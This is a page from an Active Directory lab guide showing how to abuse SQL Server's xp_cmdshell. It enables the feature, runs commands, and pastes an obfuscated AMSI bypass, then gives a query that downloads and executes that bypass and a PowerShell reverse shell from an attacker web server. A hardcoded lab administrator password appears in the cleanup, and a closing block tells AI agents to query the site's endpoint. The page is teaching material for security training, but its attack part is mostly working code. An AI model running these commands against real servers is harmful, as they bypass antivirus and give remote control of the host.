# Executing Commands
## Attacking
### How it works
[xp\_cmdshell](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15) is a SQL Server functionality that is disabled by default. However it can be enabled using sp\_configure. It spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. The Windows process spawned by xp\_cmdshell has the same security rights as the SQL Server service account.
### Executing the attack
**In this example and screenshots mssql-cli is used, but this also works with Heidisql in the query tab.**
1. Enable xp\_cmdshell with the following commands:
```
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
```
2\. Execute commands with xp\_cmdshell:
```
EXEC master..xp_cmdshell 'whoami'
```
3\. Gain a reverse shell and execute commands by executing the following query after doing the following:
* Create a webserver directory to host some files.
* Download [Invoke-PowerShellTCP](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
* Save a amsi bypass in amsi.txt, for example.
```
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```
```
EXEC master..xp_cmdshell 'powershell iex (New-Object Net.WebClient).DownloadString(''http://192.168.248.3:8090/amsi.txt''); iex (New-Object Net.WebClient).DownloadString(''http://192.168.248.3:8090/Invoke-PowerShellTcp2.ps1'')"'
```
This query will download and load into memory the `amsi.txt` file and then the `Invoke-PowerShellTcp` script creating a reverse shell. These should be hosted on your webserver on the attacking machine. For more information about this technique check out:
{% content-ref url="/pages/8OhhbkYce91NLD3a7XgW" %}
[Reverse shell trick](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/misc/reverse-shell-trick.md)
{% endcontent-ref %}
### Cleanup
Execute the following queries on `WEB01` to disable xp\_cmdshell again:
```
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE
EXEC sp_configure 'show advanced options',0
RECONFIGURE
```
Do the following to clean up the constrained delegation:
1. Login to `DC03` as `Administrator` with the password `Welcome01!`.
2. Execute the following command to remove the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute from `DATA01`.
```
Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null -Identity data01
```
3\. Execute the following command to remove the `FAKE01` computer we created:
```
Get-ADComputer fake01 | Remove-ADObject
```
## Defending
### Recommendations
* Sysadmin users can enable xp\_cmdshell, so limit these users.
### Detection
## References
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/executing-commands.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.